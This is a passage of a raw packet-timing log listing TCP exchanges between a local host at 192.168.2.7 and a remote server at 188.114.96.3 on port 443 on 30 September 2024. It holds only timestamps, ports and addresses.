                                                                                                                                                                        Sep 30, 2024 18:19:09.959856033 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.959928036 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.959935904 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.959980011 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.960688114 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.960705042 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.960777998 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.960786104 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.960832119 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.962567091 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.962583065 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.962660074 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.962667942 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.962712049 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.963596106 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.963610888 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.963680983 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.963694096 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.963737965 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.964576960 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.964597940 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.964658022 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.964664936 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.964719057 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.966526985 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.966542959 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.966614962 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.966622114 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.966671944 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.967349052 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.967365026 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.967437983 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:09.967444897 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:09.967490911 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.000896931 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.000921011 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.000987053 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.001002073 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.001053095 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.051393032 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.051415920 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.051558018 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.051568031 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.051619053 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.052429914 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.052445889 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.052505016 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.052511930 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.052562952 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.053451061 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.053473949 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.053530931 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.053539038 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.053580999 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.054732084 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.054747105 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.054815054 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.054821014 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.054869890 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.055707932 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.055752039 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.055783987 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.055792093 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.055824041 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.055846930 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.056659937 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.056679010 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.056741953 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.056750059 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.056792974 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.057636023 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.057673931 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.057704926 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.057712078 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.057742119 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.057761908 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.059269905 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.059288025 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.059355021 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.059362888 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.059422016 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.141705036 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.141727924 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.141863108 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.141875982 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.141942978 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.142852068 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.142868042 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.142944098 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.142951965 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.142992020 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.144211054 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.144227982 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.144285917 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.144294977 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.144334078 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.144953012 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.144968987 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.145025015 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.145034075 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.145068884 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.145884991 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.145899057 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.145951986 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.145961046 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.145999908 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.146804094 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.146821022 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.146879911 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.146889925 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.146936893 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.148602962 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.148623943 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.148683071 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.148689985 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.148732901 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.149449110 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.149473906 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.149509907 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.149519920 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.149543047 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.149558067 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.232362986 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.232387066 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.232510090 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.232522964 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.232572079 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.233000994 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.233016968 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.233073950 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.233082056 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.233119965 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.234011889 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.234028101 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.234097958 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.234105110 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.234133959 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.234889030 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.234904051 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.234968901 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.234976053 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.235003948 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.235018969 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.235744953 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.235759974 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.235825062 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.235832930 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.235876083 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.236510992 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.236526012 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.236584902 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.236593008 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.236639023 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.237339973 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.237354994 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.237410069 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.237420082 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.237446070 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.237462997 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.238504887 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.238521099 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.238595963 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.238603115 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.238643885 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.322995901 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.323025942 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.323146105 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.323178053 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.323230028 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.323591948 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.323607922 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.323671103 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.323678970 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.323723078 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.324413061 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.324433088 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.324491024 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.324498892 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.324542046 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.325284958 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.325299978 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.325357914 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.325367928 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.325402975 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.326287985 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.326303005 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.326361895 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.326370955 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.326421022 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.326869011 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.326884985 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.326927900 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.326936007 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.326977015 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.328205109 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.328221083 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.328274012 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.328280926 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.328319073 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.363220930 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.363240004 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.363329887 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.363348961 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.363398075 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.413747072 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.413770914 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.413865089 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.413882017 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.413930893 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.414426088 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.414443016 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.414489985 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.414499044 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.414544106 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.414875984 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.414890051 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.414948940 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.414957047 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.415000916 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.415616035 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.415632963 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.415689945 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.415698051 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.415740967 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.416914940 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.416932106 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.416980028 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.416990995 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.417032957 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.417463064 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.417479038 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.417520046 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.417536020 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.417553902 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.417571068 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.419245005 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.419264078 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.419323921 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.419332981 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.419373035 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.453922987 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.453947067 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.454037905 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.454050064 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.454092026 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.504293919 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.504316092 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.504360914 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.504374981 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.504401922 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.504412889 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.504774094 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.504790068 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.504832983 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.504839897 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.504868984 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.504888058 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.505340099 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.505356073 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.505414009 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.505425930 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.505460978 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.506207943 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.506222010 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.506283998 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.506294012 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.506335974 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.506763935 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.506779909 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.506822109 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.506829023 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.506854057 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.506871939 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.507647991 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.507668018 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.507700920 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.507708073 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.507734060 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.507755995 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.508064985 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.508080006 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.508128881 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.508137941 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.508177042 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.544529915 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.544552088 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:10.544615030 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:10.544629097 CEST44349701188.114.96.3192.168.2.7
